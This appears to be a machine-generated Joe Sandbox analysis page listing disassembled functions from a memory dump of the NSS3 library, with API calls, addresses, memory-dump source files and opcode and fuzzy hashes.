Function 6C748F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C747313), ref: 6C748FBB

Part of subcall function 6C7407B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C6E8298,?,?,?,6C6DFCE5,?), ref: 6C7407BF
Part of subcall function 6C7407B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7407E6
Part of subcall function 6C7407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C74081B
Part of subcall function 6C7407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C740825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C747313), ref: 6C749012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C747313), ref: 6C74903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C747313), ref: 6C74909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C747313), ref: 6C7490DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C747313), ref: 6C7490F1

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C747313), ref: 6C74906B

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C747313), ref: 6C749128

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: ef15652bffdd0e4348e50c4a79cd01db0e99490193a171783e810e9ac4517beb
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: 31519E71A00202CBEB10DF6ADF48B66B3F9AF64359F158079D915D7B61EB31E804CA91

Function 6C6F9C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 6C6F8850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C700715), ref: 6C6F8859
Part of subcall function 6C6F8850: PR_NewLock.NSS3 ref: 6C6F8874
Part of subcall function 6C6F8850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C6F888D

PR_NewLock.NSS3 ref: 6C6F9CAD

Part of subcall function 6C7A98D0: calloc.MOZGLUE(00000001,00000084,6C6D0936,00000001,?,6C6D102C), ref: 6C7A98E5

Part of subcall function 6C6D07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C66204A), ref: 6C6D07AD
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C66204A), ref: 6C6D07CD
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C66204A), ref: 6C6D07D6
Part of subcall function 6C6D07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C66204A), ref: 6C6D07E4
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,6C66204A), ref: 6C6D0864
Part of subcall function 6C6D07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6D0880
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,?,6C66204A), ref: 6C6D08CB
Part of subcall function 6C6D07A0: TlsGetValue.KERNEL32(?,?,6C66204A), ref: 6C6D08D7
Part of subcall function 6C6D07A0: TlsGetValue.KERNEL32(?,?,6C66204A), ref: 6C6D08FB

TlsGetValue.KERNEL32 ref: 6C6F9CE8
EnterCriticalSection.KERNEL32(?,?,6C6FECEC,6C702FCD,00000000,?,6C702FCD,?), ref: 6C6F9D01
TlsGetValue.KERNEL32(?,?,?,6C6FECEC,6C702FCD,00000000,?,6C702FCD,?), ref: 6C6F9D38
EnterCriticalSection.KERNEL32(?,?,6C6FECEC,6C702FCD,00000000,?,6C702FCD,?), ref: 6C6F9D4D
PR_Unlock.NSS3 ref: 6C6F9D70
PR_Unlock.NSS3 ref: 6C6F9DC3
PR_NewLock.NSS3 ref: 6C6F9DDD

Part of subcall function 6C6F88D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C700725,00000000,00000058), ref: 6C6F8906
Part of subcall function 6C6F88D0: EnterCriticalSection.KERNEL32(?), ref: 6C6F891A
Part of subcall function 6C6F88D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C6F894A
Part of subcall function 6C6F88D0: calloc.MOZGLUE(00000001,6C70072D,00000000,00000000,00000000,?,6C700725,00000000,00000058), ref: 6C6F8959
Part of subcall function 6C6F88D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C6F8993
Part of subcall function 6C6F88D0: PR_Unlock.NSS3(?), ref: 6C6F89AF

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
String ID:
API String ID: 3394263606-0
Opcode ID: f65c8b20c128f4efec7bc4353a92cb2dd93d563b2da7d0cc03e1abefd1c761e1
Instruction ID: d299dc7381d1ca51a2a46354bcc57a7137850fbcf87d8675c96f3bc967fb850e
Opcode Fuzzy Hash: f65c8b20c128f4efec7bc4353a92cb2dd93d563b2da7d0cc03e1abefd1c761e1
Instruction Fuzzy Hash: 1651A471A04B058FDB10EF69C08469EBBF2BF4534CF158969D8689B711DB30E846CBE5

Function 6C7F9EA0 Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C7F9EC0
EnterCriticalSection.KERNEL32(?), ref: 6C7F9EF9
_PR_MD_UNLOCK.NSS3(?), ref: 6C7F9F73
EnterCriticalSection.KERNEL32(?), ref: 6C7F9FA5
_PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6C7F9FCF
_PR_MD_UNLOCK.NSS3(?), ref: 6C7F9FF2
_PR_MD_UNLOCK.NSS3(?), ref: 6C7FA01D

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: fcd78241b540ab04d130bc52b13ab04f2a950b8c509242f98e2901cec1a3439f
Instruction ID: f595e3a25b6321216859fc6464942ad6e6cf96efd1ac60ffcf45a45e19e15060
Opcode Fuzzy Hash: fcd78241b540ab04d130bc52b13ab04f2a950b8c509242f98e2901cec1a3439f
Instruction Fuzzy Hash: 1C51D2B2800600CBCB209F66D5C864AB7F4FF24318F25867AD86957B16E731F896CBD1

Function 6C6EDCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C6EDCFA

Part of subcall function 6C7A9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C7F0A27), ref: 6C7A9DC6
Part of subcall function 6C7A9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C7F0A27), ref: 6C7A9DD1
Part of subcall function 6C7A9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7A9DED

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C6EDD40
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C6EDD62
CERT_DestroyCertificate.NSS3(?), ref: 6C6EDD71
CERT_DestroyCertificate.NSS3(00000000), ref: 6C6EDD81
CERT_RemoveCertListNode.NSS3(?), ref: 6C6EDD8F

Part of subcall function 6C7006A0: TlsGetValue.KERNEL32 ref: 6C7006C2
Part of subcall function 6C7006A0: EnterCriticalSection.KERNEL32(?), ref: 6C7006D6
Part of subcall function 6C7006A0: PR_Unlock.NSS3 ref: 6C7006EB

CERT_DestroyCertificate.NSS3(?), ref: 6C6EDD9E
CERT_DestroyCertificate.NSS3(?), ref: 6C6EDDB7

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
String ID:
API String ID: 653623313-0
Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction ID: 947616ab4114537ac6bb7c2364c60cbacb3cad207e90eadc36f1febbdebaf55e
Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction Fuzzy Hash: 44218EB6E062159BDB019EA4DC40ADEBBF4AF49318B140026E814A7705F721E915CBE9

Function 6C775F60 Relevance: 12.1, APIs: 8, Instructions: 64COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C77AADB,?,?,?,?,?,?,?,?,00000000,?,6C7780C1), ref: 6C775F72

Part of subcall function 6C6DED70: DeleteCriticalSection.KERNEL32(?), ref: 6C6DED8F
Part of subcall function 6C6DED70: DeleteCriticalSection.KERNEL32(?), ref: 6C6DED9E
Part of subcall function 6C6DED70: DeleteCriticalSection.KERNEL32(?), ref: 6C6DEDA4

PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C77AADB,?,?,?,?,?,?,?,?,00000000,?,6C7780C1), ref: 6C775F8F
DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C77AADB,?,?,?,?,?,?,?,?,00000000,?,6C7780C1), ref: 6C775FCC
free.MOZGLUE(?,?,6C77AADB,?,?,?,?,?,?,?,?,00000000,?,6C7780C1), ref: 6C775FD3
DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C77AADB,?,?,?,?,?,?,?,?,00000000,?,6C7780C1), ref: 6C775FF4
free.MOZGLUE(?,?,6C77AADB,?,?,?,?,?,?,?,?,00000000,?,6C7780C1), ref: 6C775FFB
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C77AADB,?,?,?,?,?,?,?,?,00000000,?,6C7780C1), ref: 6C776019
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C77AADB,?,?,?,?,?,?,?,?,00000000,?,6C7780C1), ref: 6C776036

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalDeleteSection$DestroyMonitor$free
String ID:
API String ID: 227462623-0
Opcode ID: d24c227bb1fcd0325ac811d60dedea8eb092439c84152cc65986b5ab73170133
Instruction ID: 4c3e613835e2fbd2759b2e4d9b55803274d41d9bd6bfe65811ca845c3028b911
Opcode Fuzzy Hash: d24c227bb1fcd0325ac811d60dedea8eb092439c84152cc65986b5ab73170133
Instruction Fuzzy Hash: 25211DF1A04B049BEA209F75D908BD3B7E8AB4670CF140938E45EC7641DB36F118CBA5

Function 6C6E3C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,6C75460B,?,?), ref: 6C6E3CA9
EnterCriticalSection.KERNEL32(?), ref: 6C6E3CB9
PL_HashTableLookup.NSS3(?), ref: 6C6E3CC9
SECITEM_DupItem_Util.NSS3(00000000), ref: 6C6E3CD6
PR_Unlock.NSS3 ref: 6C6E3CE6
CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C6E3CF6
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6E3D03
PR_Unlock.NSS3 ref: 6C6E3D15

Part of subcall function 6C78DD70: TlsGetValue.KERNEL32 ref: 6C78DD8C
Part of subcall function 6C78DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C78DDB4

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
String ID:
API String ID: 1376842649-0
Opcode ID: 279001bd08f618c0bd6ad1852780302b5618790d7dca1ace3599ec71541b9a86
Instruction ID: 6958fbd7936d3e32cd1636dd08371283c65a71ae74639fc2feef291776637932
Opcode Fuzzy Hash: 279001bd08f618c0bd6ad1852780302b5618790d7dca1ace3599ec71541b9a86
Instruction Fuzzy Hash: FD1129B6E05115A7DB212A24AC098AA3AB8EF0725DB164132ED1C83722FB22D858C6D5

Function 6C758C10 Relevance: 10.8, APIs: 7, Instructions: 279COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C758C93

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

Part of subcall function 6C738A60: TlsGetValue.KERNEL32(6C6E61C4,?,6C6E5F9C,00000000), ref: 6C738A81
Part of subcall function 6C738A60: TlsGetValue.KERNEL32(?,?,?,6C6E5F9C,00000000), ref: 6C738A9E
Part of subcall function 6C738A60: EnterCriticalSection.KERNEL32(?,?,?,?,6C6E5F9C,00000000), ref: 6C738AB7
Part of subcall function 6C738A60: PR_Unlock.NSS3(?,?,?,?,?,6C6E5F9C,00000000), ref: 6C738AD2

memset.VCRUNTIME140(?,00000000,?), ref: 6C758CFB
memset.VCRUNTIME140(?,00000000,?), ref: 6C758D10

Part of subcall function 6C738970: TlsGetValue.KERNEL32(?,00000000,6C6E61C4,?,6C6E5639,00000000), ref: 6C738991
Part of subcall function 6C738970: TlsGetValue.KERNEL32(?,?,?,?,?,6C6E5639,00000000), ref: 6C7389AD
Part of subcall function 6C738970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C6E5639,00000000), ref: 6C7389C6
Part of subcall function 6C738970: PR_WaitCondVar.NSS3 ref: 6C7389F7
Part of subcall function 6C738970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6C6E5639,00000000), ref: 6C738A0C

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockmemset$CondErrorWait
String ID:
API String ID: 2412912262-0
Opcode ID: f2371f9eca1a08dbc661e4578df7fa308a6bfb8a38f1b591ddde554e2f6593ca
Instruction ID: 7602c7be0acc73b927bee08f145b6e01add4169ebc5e723234df011f24d6d84b
Opcode Fuzzy Hash: f2371f9eca1a08dbc661e4578df7fa308a6bfb8a38f1b591ddde554e2f6593ca
Instruction Fuzzy Hash: 74B180B0D103089FEB15CF65DD44AAEB7BAFF48308F50412EE81AA7751EB31A955CB90

Function 6C6E9C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7011C0: PR_NewLock.NSS3 ref: 6C701216

free.MOZGLUE(?), ref: 6C6E9E17
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6E9E25
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6E9E4E
TlsGetValue.KERNEL32 ref: 6C6E9EA2

Part of subcall function 6C6F9500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C6F9546

EnterCriticalSection.KERNEL32(?), ref: 6C6E9EB6
PR_Unlock.NSS3 ref: 6C6E9ED9
PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C6E9F18

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
String ID:
API String ID: 3381623595-0
Opcode ID: 8c9bc234fd1efed393dcbac1ee308bba0ad7f444e15a6f59ed571caafc0ee305
Instruction ID: 241fa54abe7fd6ce75c3fad12d7a23d16cb0832d0e2da973d829b5a7119f4a0b
Opcode Fuzzy Hash: 8c9bc234fd1efed393dcbac1ee308bba0ad7f444e15a6f59ed571caafc0ee305
Instruction Fuzzy Hash: F38125B1A05601ABEB109F34DC44AEB77E9BF4934CF14452AED5883B01FB31E819CB99

Function 6C6FDCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6FAB10: DeleteCriticalSection.KERNEL32(D958E852,6C701397,5B5F5EC0,?,?,6C6FB1EE,2404110F,?,?), ref: 6C6FAB3C
Part of subcall function 6C6FAB10: free.MOZGLUE(D958E836,?,6C6FB1EE,2404110F,?,?), ref: 6C6FAB49
Part of subcall function 6C6FAB10: DeleteCriticalSection.KERNEL32(5D5E6C8F), ref: 6C6FAB5C
Part of subcall function 6C6FAB10: free.MOZGLUE(5D5E6C83), ref: 6C6FAB63
Part of subcall function 6C6FAB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C6FAB6F
Part of subcall function 6C6FAB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C6FAB76

TlsGetValue.KERNEL32 ref: 6C6FDCFA
EnterCriticalSection.KERNEL32(00000000), ref: 6C6FDD0E
PK11_IsFriendly.NSS3(?), ref: 6C6FDD73
PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C6FDD8B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6FDE81
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6FDEA6
PR_Unlock.NSS3(?), ref: 6C6FDF08

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
String ID:
API String ID: 519503562-0
Opcode ID: 63a3601308f3f7a0da75c50aef7bead9bba55aa03fe013bb18e8091db13684c7
Instruction ID: dd3aaa94717247bdbdd88943efe305d095b2d22ce295c21f5b593d0494e3bf06
Opcode Fuzzy Hash: 63a3601308f3f7a0da75c50aef7bead9bba55aa03fe013bb18e8091db13684c7
Instruction Fuzzy Hash: D991D4B5A001059FEB00CF68C885BAAB7B3BF45308F154025DD299B752E731F907CBA9

Function 6C6B5FC0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000293F4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,6C79BB62,00000004,6C804CA4,?,?,00000000,?,?,6C6731DB), ref: 6C6B60AB
sqlite3_config.NSS3(00000004,6C804CA4,6C79BB62,00000004,6C804CA4,?,?,00000000,?,?,6C6731DB), ref: 6C6B60EB
sqlite3_config.NSS3(00000012,6C804CC4,?,?,6C79BB62,00000004,6C804CA4,?,?,00000000,?,?,6C6731DB), ref: 6C6B6122

Strings

%s at line %d of [%.10s], xrefs: 6C6B60A4
misuse, xrefs: 6C6B609F
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6B6095

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: sqlite3_config$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
API String ID: 1634735548-648709467
Opcode ID: a13bffb1cd4bd1fb1f3f714776726f9d8c42c7127518d39e0dadfe3a28cad804
Instruction ID: 2e72988f4b0e0a8e0e21f72e710aa473751896c5ce8cadef98b7c0d614c12660
Opcode Fuzzy Hash: a13bffb1cd4bd1fb1f3f714776726f9d8c42c7127518d39e0dadfe3a28cad804
Instruction Fuzzy Hash: A5B12274E0464ACFCB28CF5CC2509A9B7F0FB1E308B159569D50DAB362D734AE84CB95

Function 6C664F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C664FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6651BB

Strings

%s at line %d of [%.10s], xrefs: 6C6651B4
misuse, xrefs: 6C6651AF
unable to delete/modify user-function due to active statements, xrefs: 6C6651DF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6651A5

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: sqlite3_logstrlen
